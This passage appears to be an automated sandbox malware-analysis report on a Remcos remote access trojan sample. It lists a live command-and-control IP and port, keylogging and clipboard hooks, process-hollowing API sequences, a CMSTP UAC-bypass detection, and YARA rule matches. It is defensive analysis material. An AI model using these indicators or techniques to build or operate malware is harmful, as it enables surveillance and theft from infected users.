                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0044E8F9 FindFirstFileExA,8_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49857 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49977 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49979 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49982 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49976 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49978 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49974 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49980 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49983 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49981 -> 192.3.64.152:2559
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49984 -> 192.3.64.152:2559
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.3.64.152 2559Jump to behavior
                  Source: Malware configuration extractorIPs: 192.3.64.152
                  Source: Joe Sandbox ViewIP Address: 192.3.64.152 192.3.64.152
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003B22EE
                  Source: svchost.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: ambiparous.exe, 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, ambiparous.exe, 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000003_2_0040A2F3
                  Source: C:\Windows\SysWOW64\svchost.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003B4164
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003B4164
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B64164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00B64164
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_004168FC
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003B3F66
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003A001C
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003CCABC
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B7CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00B7CABC
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041CA73 SystemParametersInfoW,3_2_0041CA73
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041CA73 SystemParametersInfoW,8_2_0041CA73

                  System Summary

                  barindex
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: This is a third-party compiled AutoIt script.0_2_00343B3A
                  Source: OKkUGRkZV7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: OKkUGRkZV7.exe, 00000000.00000003.1354253807.0000000003F03000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0038f306-f
                  Source: OKkUGRkZV7.exe, 00000000.00000003.1354253807.0000000003F03000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_04113fad-b
                  Source: OKkUGRkZV7.exe, 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c5e7771d-c
                  Source: OKkUGRkZV7.exe, 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_477a71c8-f
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: This is a third-party compiled AutoIt script.2_2_00AF3B3A
                  Source: ambiparous.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ambiparous.exe, 00000002.00000000.1354777001.0000000000BA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4e3926b0-c
                  Source: ambiparous.exe, 00000002.00000000.1354777001.0000000000BA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5c467cf6-8
                  Source: ambiparous.exe, 00000007.00000002.1536966033.0000000000BA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6a610fee-f
                  Source: ambiparous.exe, 00000007.00000002.1536966033.0000000000BA4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6a189d7e-6
                  Source: OKkUGRkZV7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4e0972f8-d
                  Source: OKkUGRkZV7.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_87205f43-7
                  Source: ambiparous.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8c376ad4-3
                  Source: ambiparous.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_beb5ec92-7
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_0041812A
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3360 ExitProcess,NtSetInformationProcess,SetErrorMode,4_2_02FD3360
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD33C0 NtSetInformationProcess,SetErrorMode,4_2_02FD33C0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003AA1EF
